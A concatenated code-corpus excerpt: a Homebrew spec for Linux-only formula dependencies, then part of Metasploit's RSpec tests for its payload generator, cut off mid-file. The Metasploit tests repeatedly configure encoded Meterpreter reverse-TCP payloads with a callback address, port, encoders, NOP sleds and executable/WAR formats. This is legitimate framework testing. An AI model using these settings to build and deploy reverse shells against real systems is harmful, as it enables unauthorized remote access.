  include_recipe "mchx_dk::#{component}"
end
| 20.2 | 54 | 0.752475 |
6a3860210960548d7a1f4251156a682ddb5018a5 | 2,904 | # typed: false
# frozen_string_literal: true
require "test/support/fixtures/testball"
require "formula"
# Specs for Formula DSL behavior on Linux: uses_from_macos acts as a real
# dependency, and on_macos/on_linux blocks gate deps, patches, and
# resources by host OS.
# NOTE(review): three sibling groups share the description "#on_linux";
# consider distinguishing them (deps / patches / resources) for clearer
# failure output.
describe Formula do
  describe "#uses_from_macos" do
    before do
      # Force the "not macOS" branch so uses_from_macos adds real deps.
      allow(OS).to receive(:mac?).and_return(false)
    end
    it "acts like #depends_on" do
      f = formula "foo" do
        url "foo-1.0"
        uses_from_macos("foo")
      end
      expect(f.class.stable.deps.first.name).to eq("foo")
      expect(f.class.head.deps.first.name).to eq("foo")
    end
    # `since:` only matters on macOS; on Linux the dep is always added.
    it "ignores OS version specifications" do
      f = formula "foo" do
        url "foo-1.0"
        uses_from_macos "foo", since: :mojave
      end
      expect(f.class.stable.deps.first.name).to eq("foo")
      expect(f.class.head.deps.first.name).to eq("foo")
    end
  end
  describe "#on_linux" do
    it "adds a dependency on Linux only" do
      f = formula do
        homepage "https://brew.sh"
        url "https://brew.sh/test-0.1.tbz"
        sha256 TEST_SHA256
        depends_on "hello_both"
        on_macos do
          depends_on "hello_macos"
        end
        on_linux do
          depends_on "hello_linux"
        end
      end
      expect(f.class.stable.deps[0].name).to eq("hello_both")
      expect(f.class.stable.deps[1].name).to eq("hello_linux")
      expect(f.class.stable.deps[2]).to eq(nil)
    end
  end
  describe "#on_linux" do
    it "adds a patch on Linux only" do
      f = formula do
        homepage "https://brew.sh"
        url "https://brew.sh/test-0.1.tbz"
        sha256 TEST_SHA256
        patch do
          on_macos do
            url "patch_macos"
          end
          on_linux do
            url "patch_linux"
          end
        end
      end
      expect(f.patchlist.length).to eq(1)
      expect(f.patchlist.first.strip).to eq(:p1)
      expect(f.patchlist.first.url).to eq("patch_linux")
    end
  end
  describe "#on_linux" do
    it "uses on_linux within a resource block" do
      f = formula do
        homepage "https://brew.sh"
        url "https://brew.sh/test-0.1.tbz"
        sha256 TEST_SHA256
        resource "test_resource" do
          on_linux do
            url "on_linux"
          end
        end
      end
      expect(f.resources.length).to eq(1)
      expect(f.resources.first.url).to eq("on_linux")
    end
  end
  describe "#shared_library" do
    # shared_library builds ".so" glob/suffix strings for Linux formulae.
    it "generates a shared library string" do
      f = Testball.new
      expect(f.shared_library("foobar")).to eq("foobar.so")
      expect(f.shared_library("foobar", 2)).to eq("foobar.so.2")
      expect(f.shared_library("foobar", nil)).to eq("foobar.so")
      expect(f.shared_library("foobar", "*")).to eq("foobar.so{,.*}")
      expect(f.shared_library("*")).to eq("*.so{,.*}")
      expect(f.shared_library("*", 2)).to eq("*.so.2")
      expect(f.shared_library("*", nil)).to eq("*.so{,.*}")
      expect(f.shared_library("*", "*")).to eq("*.so{,.*}")
    end
  end
end
| 24.403361 | 69 | 0.580234 |
1159f04cd3ab683a6f4e7dbea8ecbe1c77da84b7 | 46,434 | require 'spec_helper'
require 'msf/core/payload_generator'
RSpec.describe Msf::PayloadGenerator do
include_context 'Msf::Simple::Framework#modules loading'
# let(:lhost) { "192.168.172.1"}
# let(:lport) { "8443" }
# let(:datastore) { { "LHOST" => lhost, "LPORT" => lport } }
# let(:add_code) { false }
# let(:arch) { "x86" }
# let(:badchars) { "\x20\x0D\x0A" }
# let(:encoder_reference_name) {
# # use encoder_module to ensure it is loaded prior to passing to generator
# encoder_module.refname
# }
# let(:format) { "raw" }
# let(:iterations) { 1 }
# let(:keep) { false }
# let(:nops) { 0 }
# let(:payload_reference_name) {
# # use payload_module to ensure it is loaded prior to passing to generator
# payload_module.refname
# }
# let(:platform) { "Windows" }
# let(:space) { 1073741824 }
# let(:stdin) { nil }
# let(:template) { File.join(Msf::Config.data_directory, "templates", "template_x86_windows.exe") }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/windows/reverse_tcp
stages/windows/meterpreter
},
module_type: 'payload',
reference_name: 'windows/meterpreter/reverse_tcp'
)
}
# let(:shellcode) { "\x50\x51\x58\x59" }
# let(:var_name) { 'buf' }
subject(:payload_generator) {
Msf::PayloadGenerator.new(generator_opts)
}
it { is_expected.to respond_to :add_code }
it { is_expected.to respond_to :arch }
it { is_expected.to respond_to :badchars }
it { is_expected.to respond_to :cli }
it { is_expected.to respond_to :encoder }
it { is_expected.to respond_to :datastore }
it { is_expected.to respond_to :format }
it { is_expected.to respond_to :framework }
it { is_expected.to respond_to :iterations }
it { is_expected.to respond_to :keep }
it { is_expected.to respond_to :nops }
it { is_expected.to respond_to :payload }
it { is_expected.to respond_to :platform }
it { is_expected.to respond_to :space }
it { is_expected.to respond_to :stdin }
it { is_expected.to respond_to :template }
context 'when creating a new generator' do
subject(:new_payload_generator) { described_class.new(generator_opts) }
context 'when not given a framework instance' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(KeyError, 'key not found: :framework') }
end
context 'when not given a payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: nil,
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(ArgumentError, "invalid payload: ") }
end
context 'when given an invalid payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'beos/meterpreter/reverse_gopher',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(ArgumentError, "invalid payload: beos/meterpreter/reverse_gopher") }
end
context 'when given a payload through stdin' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.not_to raise_error }
end
context 'when given an invalid format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'foobar',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(Msf::InvalidFormat, "invalid format: foobar") }
end
context 'when given any valid transform format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: ::Msf::Simple::Buffer.transform_formats.sample,
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.not_to raise_error }
end
context 'when given any valid executable format' do
let(:format) { ::Msf::Util::EXE.to_executable_fmt_formats.sample }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: ::Msf::Util::EXE.to_executable_fmt_formats.sample,
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.not_to raise_error }
end
end
context 'when not given a platform' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: '',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context '#platform_list' do
it 'returns an empty PlatformList' do
expect(payload_generator.platform_list.platforms).to be_empty
end
end
context '#choose_platform' do
it 'chooses the platform list for the module' do
expect(payload_generator.choose_platform(payload_module).platforms).to eq [Msf::Module::Platform::Windows]
end
it 'sets the platform attr to the first platform of the module' do
my_generator = payload_generator
my_generator.choose_platform(payload_module)
expect(my_generator.platform).to eq "Windows"
end
end
end
context 'when given an invalid platform' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'foobar',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context '#platform_list' do
it 'returns an empty PlatformList' do
expect(payload_generator.platform_list.platforms).to be_empty
end
end
context '#choose_platform' do
it 'chooses the platform list for the module' do
expect(payload_generator.choose_platform(payload_module).platforms).to eq [Msf::Module::Platform::Windows]
end
end
end
context 'when given a valid platform' do
context '#platform_list' do
it 'returns a PlatformList containing the Platform class' do
expect(payload_generator.platform_list.platforms.first).to eq Msf::Module::Platform::Windows
end
end
context '#choose_platform' do
context 'when the chosen platform matches the module' do
it 'returns the PlatformList for the selected platform' do
expect(payload_generator.choose_platform(payload_module).platforms).to eq payload_generator.platform_list.platforms
end
end
context 'when the chosen platform and module do not match' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'linux',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns an empty PlatformList' do
expect(payload_generator.choose_platform(payload_module).platforms).to be_empty
end
end
end
end
context '#choose_arch' do
context 'when no arch is selected' do
let(:generator_opts) {
{
add_code: false,
arch: '',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the first arch of the module' do
expect(payload_generator.choose_arch(payload_module)).to eq "x86"
end
it 'sets the arch to match the module' do
my_generator = payload_generator
my_generator.choose_arch(payload_module)
expect(my_generator.arch).to eq "x86"
end
end
context 'when the arch matches the module' do
it 'returns the selected arch' do
expect(payload_generator.choose_arch(payload_module)).to eq 'x86'
end
end
context 'when the arch does not match the module' do
let(:arch) { "mipsle" }
let(:generator_opts) {
{
add_code: false,
arch: 'mipsle',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it "returns nil" do
expect(payload_generator.choose_arch(payload_module)).to be_nil
end
end
end
context '#generate_raw_payload' do
context 'when passing a payload through stdin' do
context 'when no arch has been selected' do
let(:generator_opts) {
{
add_code: false,
arch: '',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatibleArch error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatibleArch, "You must select an arch for a custom payload")
end
end
context 'when no platform has been selected' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: '',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatiblePlatform error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatiblePlatform, "You must select a platform for a custom payload")
end
end
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the payload from stdin' do
expect(payload_generator.generate_raw_payload).to eq "\x90\x90\x90"
end
end
context 'when selecting a metasploit payload' do
context 'when the platform is incompatible with the payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'linux',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatiblePlatform error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatiblePlatform, "The selected platform is incompatible with the payload")
end
end
context 'when the arch is incompatible with the payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'mipsle',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatibleArch error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatibleArch, "The selected arch is incompatible with the payload")
end
end
context 'when one or more datastore options are missing' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: {} ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'should raise an error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::OptionValidateError)
end
end
it 'returns the raw bytes of the payload' do
expect(payload_generator.generate_raw_payload).to be_present
end
end
end
context '#add_shellcode' do
let(:shellcode) { "\x50\x51\x58\x59" }
context 'when add_code is empty' do
it 'returns the original shellcode' do
expect(payload_generator.add_shellcode(shellcode)).to eq shellcode
end
end
context 'when add_code points to a valid file' do
context 'but platform is not Windows' do
let(:generator_opts) {
{
add_code: File.join(FILE_FIXTURES_PATH, "nop_shellcode.bin"),
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Linux',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the original shellcode' do
expect(payload_generator.add_shellcode(shellcode)).to eq shellcode
end
end
context 'but arch is not x86' do
let(:generator_opts) {
{
add_code: File.join(FILE_FIXTURES_PATH, "nop_shellcode.bin"),
arch: 'x64',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the original shellcode' do
expect(payload_generator.add_shellcode(shellcode)).to eq shellcode
end
end
it 'returns modified shellcode' do
skip "This is a bad test and needs to be refactored"
# The exact length is variable due to random nops inserted into the routine
# It looks like it should always be > 300
# Can't do precise output matching due to this same issue
expect(payload_generator.add_shellcode(shellcode).length).to be > 300
end
end
context 'when add_code points to an invalid file' do
let(:generator_opts) {
{
add_code: "gurfjhfdjhfdsjhfsdvfverf444",
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an error' do
expect{payload_generator.add_shellcode(shellcode)}.to raise_error(Errno::ENOENT)
end
end
end
context '#prepend_nops' do
let(:shellcode) { "\x50\x51\x58\x59" }
context 'when nops are set to 0' do
before(:example) do
load_and_create_module(
module_type: 'nop',
reference_name: 'x86/opty2'
)
end
it 'returns the unmodified shellcode' do
expect(payload_generator.prepend_nops(shellcode)).to eq shellcode
end
end
context 'when nops are set to more than 0' do
before(:example) do
load_and_create_module(
module_type: 'nop',
reference_name: 'x86/opty2'
)
end
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: '',
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 20,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'when payload is x86' do
it 'returns shellcode of the correct size' do
final = payload_generator.prepend_nops(shellcode)
expect(final.length).to eq 24
end
it 'puts the nops in front of the original shellcode' do
expect(payload_generator.prepend_nops(shellcode)[20,24]).to eq shellcode
end
end
context 'when payload is Windows x64' do
let(:generator_opts) {
{
add_code: false,
arch: 'x64',
badchars: '',
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 20,
payload: 'windows/x64/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
before(:example) do
load_and_create_module(
module_type: 'nop',
reference_name: 'x64/simple'
)
load_and_create_module(
ancestor_reference_names: %w{
stagers/windows/x64/reverse_tcp
stages/windows/x64/meterpreter
},
module_type: 'payload',
reference_name: 'windows/x64/meterpreter/reverse_tcp'
)
end
it 'returns shellcode of the correct size' do
final = payload_generator.prepend_nops(shellcode)
expect(final.length).to eq(20 + shellcode.length)
end
it 'puts the nops in front of the original shellcode' do
final = payload_generator.prepend_nops(shellcode)
expect(final[20, 20 + shellcode.length]).to eq shellcode
end
end
end
end
context '#get_encoders' do
let!(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
let(:encoder_names) { ["Polymorphic XOR Additive Feedback Encoder", "Alpha2 Alphanumeric Mixedcase Encoder" ] }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'when an encoder is selected' do
it 'returns an array' do
expect(payload_generator.get_encoders).to be_kind_of Array
end
it 'returns an array with only one element' do
expect(payload_generator.get_encoders.count).to eq 1
end
it 'returns the correct encoder in the array' do
expect(payload_generator.get_encoders.first.name).to eq encoder_names[0]
end
end
context 'when multiple encoders are selected' do
#
# lets
#
# let(:encoder_reference_name) {
# encoder_reference_names.join(',')
# }
#
# let(:encoder_reference_names) {
# %w{
# x86/shikata_ga_nai
# x86/alpha_mixed
# }
# }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai,x86/alpha_mixed',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
before(:example) do
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/alpha_mixed'
)
end
it 'returns an array of the right size' do
expect(payload_generator.get_encoders.count).to eq 2
end
it 'returns each of the selected encoders in the array' do
payload_generator.get_encoders.each do |msf_encoder|
expect(encoder_names).to include msf_encoder.name
end
end
it 'returns the encoders in order of rank high to low' do
expect(payload_generator.get_encoders[0].rank).to be > payload_generator.get_encoders[1].rank
end
end
context 'when no encoder is selected but badchars are present' do
# let(:encoder_reference_name) { '' }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: '',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns an array of all encoders with a compatible arch' do
payload_generator.get_encoders.each do |my_encoder|
expect(my_encoder.arch).to include 'x86'
end
end
end
context 'when no encoder or badchars are selected' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: '',
encoder: '',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
let(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
it 'returns an empty array' do
expect(payload_generator.get_encoders).to be_empty
end
end
end
context '#run_encoder' do
let(:shellcode) { "\x50\x51\x58\x59" }
let(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
it 'should call the encoder a number of times equal to the iterations' do
expect(encoder_module).to receive(:encode).exactly(1).times.and_return(shellcode)
payload_generator.run_encoder(encoder_module, shellcode)
end
context 'when the encoder makes a buffer too large' do
# let(:space) { 4 }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 4,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'should raise an error' do
expect{payload_generator.run_encoder(encoder_module, shellcode)}.to raise_error(Msf::EncoderSpaceViolation, "encoder has made a buffer that is too big")
end
end
end
context '#format_payload' do
let(:shellcode) { "\x50\x51\x58\x59" }
context 'when format is js_be' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'js_be',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'and arch is x86' do
it 'should raise an IncompatibleEndianess error' do
expect{payload_generator.format_payload(shellcode)}.to raise_error(Msf::IncompatibleEndianess, "Big endian format selected for a non big endian payload")
end
end
end
context 'when format is a transform format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'c',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'applies the appropriate transform format' do
expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf')
payload_generator.format_payload(shellcode)
end
end
context 'when format is an executable format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'exe',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'applies the appropriate executable format' do
expect(::Msf::Util::EXE).to receive(:to_executable_fmt).with(framework, 'x86', kind_of(payload_generator.platform_list.class), shellcode, 'exe', payload_generator.exe_options)
payload_generator.format_payload(shellcode)
end
end
end
context '#generate_java_payload' do
context 'when format is war' do
context 'if the payload is a valid java payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'war',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
let(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/java/reverse_tcp
stages/java/meterpreter
},
module_type: 'payload',
reference_name: 'java/meterpreter/reverse_tcp'
)
}
it 'calls the generate_war on the payload' do
allow(framework).to receive_message_chain(:payloads, :keys).and_return ['java/meterpreter/reverse_tcp']
allow(framework).to receive_message_chain(:payloads, :create).and_return(payload_module)
expect(payload_module).to receive(:generate_war).and_call_original
payload_generator.generate_java_payload
end
end
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'war',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
